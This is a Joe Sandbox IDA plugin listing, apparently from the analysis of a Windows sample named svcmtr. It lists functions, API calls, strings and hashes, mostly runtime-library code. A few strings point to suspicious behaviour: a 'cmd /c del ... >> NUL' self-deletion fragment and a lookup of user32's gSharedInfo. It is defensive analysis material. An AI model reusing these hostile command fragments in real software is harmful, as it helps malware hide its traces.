                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Name$EnvironmentExecuteFileModulePathShellShortVariable
                                                                                                                            • String ID: >> NUL$/c del $ComSpec
                                                                                                                            • API String ID: 1296078269-547624796
                                                                                                                            • Opcode ID: 8b3b51dccad2e54022be03ab2b0c10837a6ec2c4e4d1ea9283e6ec6af23a601c
                                                                                                                            • Instruction ID: a9eb13e3e64ffb1a7c6eb7d3c2949bb5ef406e474b692f1edf18b5435e39ebdc
                                                                                                                            • Opcode Fuzzy Hash: 8b3b51dccad2e54022be03ab2b0c10837a6ec2c4e4d1ea9283e6ec6af23a601c
                                                                                                                            • Instruction Fuzzy Hash: 4221A774740218B6E714DB61DD86FE97378DB0C741F404099F705E61C1DAB8AA848B5C
                                                                                                                            Function 0041E8A0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34windowregistryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Load$Icon$ClassCursorRegister
                                                                                                                            • String ID: 0$SCAN$m
                                                                                                                            • API String ID: 4202395251-3574835850
                                                                                                                            • Opcode ID: 627f741942ed8ffa665dcbac24e0f7554396b1014172c2ecc967683f971c8674
                                                                                                                            • Instruction ID: cd2708527f8c9ff307f3812adb0760e774757ce43e84b82f15cc096565d65217
                                                                                                                            • Opcode Fuzzy Hash: 627f741942ed8ffa665dcbac24e0f7554396b1014172c2ecc967683f971c8674
                                                                                                                            • Instruction Fuzzy Hash: 2201F6B0C10218ABEB00DFE4D819BDFBFB8EB08304F10415AE904B7290D7BA16148FD8
                                                                                                                            Function 0041E920 Relevance: 10.6, APIs: 7, Instructions: 101windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0041E960
                                                                                                                            • DefWindowProcW.USER32(?,00000111,?,?), ref: 0041E991
                                                                                                                            • BeginPaint.USER32(?,?), ref: 0041E9F5
                                                                                                                            • EndPaint.USER32(?,?), ref: 0041EA01
                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 0041EA1D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3181456275-0
                                                                                                                            • Opcode ID: cb681f4638388885bc1e2f9ed1f61d75574201e5c8038efff34d4deca7bd3fbd
                                                                                                                            • Instruction ID: 6c2d3888f3e435d877acf54aaf2b45d1e93d16ee1ac06b446370fa4d32732ff5
                                                                                                                            • Opcode Fuzzy Hash: cb681f4638388885bc1e2f9ed1f61d75574201e5c8038efff34d4deca7bd3fbd
                                                                                                                            • Instruction Fuzzy Hash: 9A31C2713141189BC714EF28EC46ABB77A8EF89311F40455FF942D62A0DB799910C7EA
                                                                                                                            Function 00427449 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00436FA8,00000008,00427551,00000000,00000000,?,00000000,00425712,00424E4C,?,00000000,?,0041D3E8,?,00000104), ref: 0042745A
                                                                                                                            • __lock.LIBCMT ref: 0042748E
                                                                                                                              • Part of subcall function 0042A4BB: __mtinitlocknum.LIBCMT ref: 0042A4D1
                                                                                                                              • Part of subcall function 0042A4BB: __amsg_exit.LIBCMT ref: 0042A4DD
                                                                                                                              • Part of subcall function 0042A4BB: EnterCriticalSection.KERNEL32(?,?,?,00427493,0000000D,?,00000000,00425712,00424E4C,?,00000000,?,0041D3E8,?,00000104,delete ), ref: 0042A4E5
                                                                                                                            • InterlockedIncrement.KERNEL32(0043A200,?,00000000,00425712,00424E4C,?,00000000,?,0041D3E8,?,00000104,delete ,?,00000000,00000104), ref: 0042749B
                                                                                                                            • __lock.LIBCMT ref: 004274AF
                                                                                                                            • ___addlocaleref.LIBCMT ref: 004274CD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                            • String ID: KERNEL32.DLL
                                                                                                                            • API String ID: 637971194-2576044830
                                                                                                                            • Opcode ID: 4ae31d47d51f25d18cb776528707a901bc0bbcf371e673cf6eeb981d2aaaecc8
                                                                                                                            • Instruction ID: 5fe0c82e3a55a1a6126772232bd8c9383c5a4faa0ed1100b0955d7a3ccf392a4
                                                                                                                            • Opcode Fuzzy Hash: 4ae31d47d51f25d18cb776528707a901bc0bbcf371e673cf6eeb981d2aaaecc8
                                                                                                                            • Instruction Fuzzy Hash: 1F018E71504B009FD720AF66E809749BBE0AF04324F60894FE895963A0CBB8A544CF19
                                                                                                                            Function 0042F1A1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 0042F1C2
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __getptd.LIBCMT ref: 0042F1D3
                                                                                                                            • __getptd.LIBCMT ref: 0042F1E1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                            • String ID: MOC$RCC$csm
                                                                                                                            • API String ID: 803148776-2671469338
                                                                                                                            • Opcode ID: 3a61ae855f10ef9ed704f8156c0f68b864c13d923e62308632c65ea9e75b47ab
                                                                                                                            • Instruction ID: 8f4253f58bd42e0126eedceda7a998e46fde0fe100d0f1c0a8004dd3f3484704
                                                                                                                            • Opcode Fuzzy Hash: 3a61ae855f10ef9ed704f8156c0f68b864c13d923e62308632c65ea9e75b47ab
                                                                                                                            • Instruction Fuzzy Hash: 97E0ED31704124AEC720A765E54AB7A32E4EB84318FD540F7E80CCB622D62CDDA4CA5B
                                                                                                                            Function 0042F44E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __CreateFrameInfo.LIBCMT ref: 0042F476
                                                                                                                              • Part of subcall function 0042F00B: __getptd.LIBCMT ref: 0042F019
                                                                                                                              • Part of subcall function 0042F00B: __getptd.LIBCMT ref: 0042F027
                                                                                                                            • __getptd.LIBCMT ref: 0042F480
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __getptd.LIBCMT ref: 0042F48E
                                                                                                                            • __getptd.LIBCMT ref: 0042F49C
                                                                                                                            • __getptd.LIBCMT ref: 0042F4A7
                                                                                                                            • _CallCatchBlock2.LIBCMT ref: 0042F4CD
                                                                                                                              • Part of subcall function 0042F0B0: __CallSettingFrame@12.LIBCMT ref: 0042F0FC
                                                                                                                              • Part of subcall function 0042F574: __getptd.LIBCMT ref: 0042F583
                                                                                                                              • Part of subcall function 0042F574: __getptd.LIBCMT ref: 0042F591
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1602911419-0
                                                                                                                            • Opcode ID: 0bb55ad1a8f18e571e8055ba5d03a78f92d849bd343b4f02beab386b201532d6
                                                                                                                            • Instruction ID: f810efa6baf9205a3d820aa4f956ba34af89ae7dadda1aa048723bd6062be242
                                                                                                                            • Opcode Fuzzy Hash: 0bb55ad1a8f18e571e8055ba5d03a78f92d849bd343b4f02beab386b201532d6
                                                                                                                            • Instruction Fuzzy Hash: A811FCB1D00219EFDF00EFA5D545A9DB7B0FF04314F90806EF81497252E73899559F58
                                                                                                                            Function 00426BCC Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 00426BD8
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __amsg_exit.LIBCMT ref: 00426BF8
                                                                                                                            • __lock.LIBCMT ref: 00426C08
                                                                                                                            • InterlockedDecrement.KERNEL32(?,00436F48,0000000C,00424569,?,?,0042BD49), ref: 00426C25
                                                                                                                            • _free.LIBCMT ref: 00426C38
                                                                                                                            • InterlockedIncrement.KERNEL32(021A2BA8,00436F48,0000000C,00424569,?,?,0042BD49), ref: 00426C50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3470314060-0
                                                                                                                            • Opcode ID: 3dc50b16b58a45325b85e3d966c219c40405d63b61814acbca95716be637b3f2
                                                                                                                            • Instruction ID: 862ff0a28eea9f8bdbb22befa2932ee8c98ff4cdf9945b71c31d560e492b3693
                                                                                                                            • Opcode Fuzzy Hash: 3dc50b16b58a45325b85e3d966c219c40405d63b61814acbca95716be637b3f2
                                                                                                                            • Instruction Fuzzy Hash: 6901E571B01631A7CB20BF56B94675E7360EB08724F96101BE890A3390C73CAD61CBDE
                                                                                                                            Function 00402C20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402C3A
                                                                                                                              • Part of subcall function 00423E37: std::exception::exception.LIBCMT ref: 00423E4C
                                                                                                                              • Part of subcall function 00423E37: __CxxThrowException@8.LIBCMT ref: 00423E61
                                                                                                                              • Part of subcall function 00423E37: std::exception::exception.LIBCMT ref: 00423E72
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402C71
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423DFF
                                                                                                                              • Part of subcall function 00423DEA: __CxxThrowException@8.LIBCMT ref: 00423E14
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423E25
                                                                                                                            • _memmove.LIBCMT ref: 00402CD1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 1615890066-4289949731
                                                                                                                            • Opcode ID: 380edce1c0a73a0bcc277f1ac483cc17226741b2a71fd0746f716acb6bbdd3c9
                                                                                                                            • Instruction ID: f380dc011fae16a05292a652e213d1f5969693d70e6bdf194ed0e62b7d50edb5
                                                                                                                            • Opcode Fuzzy Hash: 380edce1c0a73a0bcc277f1ac483cc17226741b2a71fd0746f716acb6bbdd3c9
                                                                                                                            • Instruction Fuzzy Hash: F82109333042105BD7209E6CE984A6EF799EBA1365B20093FF041DB2C1C6F9D94483A8
                                                                                                                            Function 0041F0C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$_memset
                                                                                                                            • String ID: eirutyerg23895385tiyiruytyieye
                                                                                                                            • API String ID: 1357608183-3501311787
                                                                                                                            • Opcode ID: db52817b56a9e07f04a64bca21f41d0bde0fac50a084c5c9463b790c56cd7182
                                                                                                                            • Instruction ID: 4c62e5054b0cfc70e15e48f7f93e1e2dd02e2ba350b6eca0a9e154429abea764
                                                                                                                            • Opcode Fuzzy Hash: db52817b56a9e07f04a64bca21f41d0bde0fac50a084c5c9463b790c56cd7182
                                                                                                                            • Instruction Fuzzy Hash: B921D9B2600705ABD720CA59DCC0A9BB3EDEB88314F10063FF94987705EA75EE45C794
                                                                                                                            Function 0042F7FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___BuildCatchObject.LIBCMT ref: 0042F80E
                                                                                                                              • Part of subcall function 0042F769: ___BuildCatchObjectHelper.LIBCMT ref: 0042F79F
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 0042F825
                                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 0042F833
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 2163707966-3733052814
                                                                                                                            • Opcode ID: 4a61a2d52b0bc3a74fdd56ea7b2520c29e380175ca527c9f51821e9418d154e1
                                                                                                                            • Instruction ID: 35c86a7ea48db691c2fae8fb970ae395304450bfd9a7a45420d77627640d1373
                                                                                                                            • Opcode Fuzzy Hash: 4a61a2d52b0bc3a74fdd56ea7b2520c29e380175ca527c9f51821e9418d154e1
                                                                                                                            • Instruction Fuzzy Hash: AE01283110012ABBDF126F52EC45EAB7E7AEF08354F804036BD1815121DB7A98B5DBA9
                                                                                                                            Function 0042526B Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00425279
                                                                                                                              • Part of subcall function 00424B82: __FF_MSGBANNER.LIBCMT ref: 00424B9B
                                                                                                                              • Part of subcall function 00424B82: __NMSG_WRITE.LIBCMT ref: 00424BA2
                                                                                                                              • Part of subcall function 00424B82: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0042BB22,?,00000001,?,?,0042A446,00000018,00437060,0000000C,0042A4D6), ref: 00424BC7
                                                                                                                            • _free.LIBCMT ref: 0042528C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1020059152-0
                                                                                                                            • Opcode ID: da80e95dcac4963b299bac8c4915ecab9e955b4e41003c8e7aeb6ee6542181f5
                                                                                                                            • Instruction ID: 303440cbd639b63c9e0f56f25b27bf7b376566829b2ef2b6ba667a5b39b707a4
                                                                                                                            • Opcode Fuzzy Hash: da80e95dcac4963b299bac8c4915ecab9e955b4e41003c8e7aeb6ee6542181f5
                                                                                                                            • Instruction Fuzzy Hash: C011AE32704E35D7CB212B75BC0565A37949F403B5FA1416BF9489A2D1DF3DD8418EAC
                                                                                                                            Function 0042734D Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 00427359
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __getptd.LIBCMT ref: 00427370
                                                                                                                            • __amsg_exit.LIBCMT ref: 0042737E
                                                                                                                            • __lock.LIBCMT ref: 0042738E
                                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 004273A2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 938513278-0
                                                                                                                            • Opcode ID: 54c2f71e7f4421a5e04ae7c57690b572abebdbd578d104f1fdc764d6efdd8cb8
                                                                                                                            • Instruction ID: 4e945a9602c2599bfda43b3e09900f0a81e55d254053af84444372c591fc76f4
                                                                                                                            • Opcode Fuzzy Hash: 54c2f71e7f4421a5e04ae7c57690b572abebdbd578d104f1fdc764d6efdd8cb8
                                                                                                                            • Instruction Fuzzy Hash: 4BF06231B49630DBD711FB657807B5962909F00728FA1418FFC44672D2DB7C5841DA5E
                                                                                                                            Function 004010A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::exception::exception.LIBCMT ref: 00401116
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040112B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throwstd::exception::exception
                                                                                                                            • String ID: NULL$4C
                                                                                                                            • API String ID: 3728558374-1282692239
                                                                                                                            • Opcode ID: 33808c3854b2259bcd7a82078fa9c6c209a995163827107ddf829d201c8a9eac
                                                                                                                            • Instruction ID: b3ae1bd3d58b088f2b380a9d5d3b1efe849a21ab515698cc0b20f447eb10873f
                                                                                                                            • Opcode Fuzzy Hash: 33808c3854b2259bcd7a82078fa9c6c209a995163827107ddf829d201c8a9eac
                                                                                                                            • Instruction Fuzzy Hash: 41115C71E00219ABCB14DFA9E841A9EBBB4EB08714F50852FE921B7281DB785604CB98
                                                                                                                            Function 0041EBE0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(user32.dll,0041ECE4,000000FC,774E267D), ref: 0041EBE5
                                                                                                                            • GetProcAddress.KERNEL32(00000000,gSharedInfo), ref: 0041EBF8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
